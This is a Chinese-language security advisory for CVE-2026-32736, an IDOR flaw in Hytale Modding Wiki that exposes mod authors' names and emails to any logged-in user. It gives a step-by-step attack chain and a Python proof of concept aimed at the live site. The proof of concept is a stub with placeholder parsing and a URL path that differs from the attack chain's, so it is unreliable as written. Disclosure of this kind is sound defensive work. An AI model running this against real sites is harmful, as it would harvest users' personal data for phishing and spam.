CVE-2026-32736 Hytale Modding Wiki IDOR漏洞暴露用户敏感信息

漏洞信息

漏洞编号

CVE-2026-32736

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Hytale Modding Wiki

漏洞概述

CVE-2026-32736是Hytale Modding Wiki中的一个中危安全漏洞，CVSS评分4.3。该漏洞属于不安全的直接对象引用（Insecure Direct Object Reference，IDOR）类型，存在于1.0.0版本之前的Wiki系统中。Hytale Modding Wiki是一个为Hytale模组开发者提供文档和Wiki托管服务的免费平台。该漏洞允许任何已认证用户（即使只拥有最低权限的普通账户）通过访问特定模组页面，获取模组作者的敏感个人信息，包括全名和电子邮件地址。由于该Wiki平台面向广大模组开发者社区，漏洞可能影响大量用户的隐私安全。攻击者只需创建一个普通账户，登录后访问任意模组页面，即可通过不正确的访问控制机制获取作者敏感信息，无需特殊权限或复杂技术手段。

技术细节

IDOR漏洞的核心问题在于应用程序对用户输入的直接对象引用缺乏充分的访问控制验证。在Hytale Modding Wiki中，当用户访问特定模组页面时，系统使用模组的slug（URL友好标识符）作为直接对象引用来获取模组作者信息。问题在于系统仅验证用户是否已登录（认证），但未验证当前登录用户是否有权访问该特定模组作者的敏感信息。具体来说，系统在处理模组页面请求时，直接将slug参数用于数据库查询，获取关联的作者记录，而没有检查请求者与作者之间的关系或权限。这使得任何已认证用户都能通过遍历不同的slug值，访问任意模组作者的个人信息。攻击者可以利用此漏洞批量收集模组作者的真实姓名和邮箱地址，用于社会工程攻击、垃圾邮件发送或其他恶意目的。该漏洞的技术根因在于访问控制逻辑的实现缺陷，而非身份验证机制的缺失。修复方案需要在获取敏感信息前增加额外的权限验证逻辑，确保只有符合特定条件的用户才能访问作者个人信息。

攻击链分析

STEP 1

步骤1

攻击者在Hytale Modding Wiki平台注册一个普通用户账户

STEP 2

步骤2

攻击者使用注册账户登录平台，获取有效会话cookie

STEP 3

步骤3

攻击者浏览Wiki平台，收集目标模组的slug标识符

STEP 4

步骤4

攻击者构造HTTP请求访问目标模组页面，如/mods/{slug}

STEP 5

步骤5

服务器收到请求后验证用户已登录，但未验证用户是否有权访问该模组作者信息

STEP 6

步骤6

服务器直接返回模组页面内容，包含作者全名和邮箱地址

STEP 7

步骤7

攻击者从响应中提取敏感信息，可用于进一步攻击或非法利用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-32736 PoC - IDOR in Hytale Modding Wiki
# This PoC demonstrates how an authenticated user can access
# author personal information via IDOR vulnerability

BASE_URL = "https://wiki.hytalemodding.com"
TARGET_SLUG = "example-mod-slug"  # Replace with actual mod slug

def exploit_idor():
    """
    Exploit IDOR vulnerability to retrieve author information
    without proper authorization check.
    """
    session = requests.Session()
    
    # Step 1: Create account and authenticate
    # (Skipped - assume attacker already has account)
    
    # Step 2: Access mod page with known slug
    mod_url = f"{BASE_URL}/mod/{TARGET_SLUG}"
    response = session.get(mod_url)
    
    if response.status_code == 200:
        # Extract author information from response
        # The vulnerable endpoint directly returns author data
        # without verifying requester's permissions
        author_info = parse_author_details(response.text)
        print(f"Author Name: {author_info['name']}")
        print(f"Author Email: {author_info['email']}")
    else:
        print("Failed to access mod page")

def parse_author_details(html_content):
    """
    Parse author details from HTML response
    In vulnerable version, author info is exposed without auth check
    """
    # Implementation depends on actual page structure
    return {
        "name": "Extracted from page",
        "email": "Extracted from page"
    }

if __name__ == "__main__":
    exploit_idor()

影响范围

Hytale Modding Wiki < 1.0.0

防御指南

临时缓解措施

如果无法立即升级到修复版本，建议采取以下临时缓解措施：限制模组页面的信息公开程度，对非必要用户隐藏作者邮箱等敏感信息；启用请求频率限制，防止攻击者批量收集数据；增加访问日志审计，及时发现异常访问行为；联系平台管理员确认当前安全状态并获取补丁信息。同时提醒模组作者注意可能的信息泄露风险，警惕针对其邮箱的钓鱼邮件和社会工程攻击。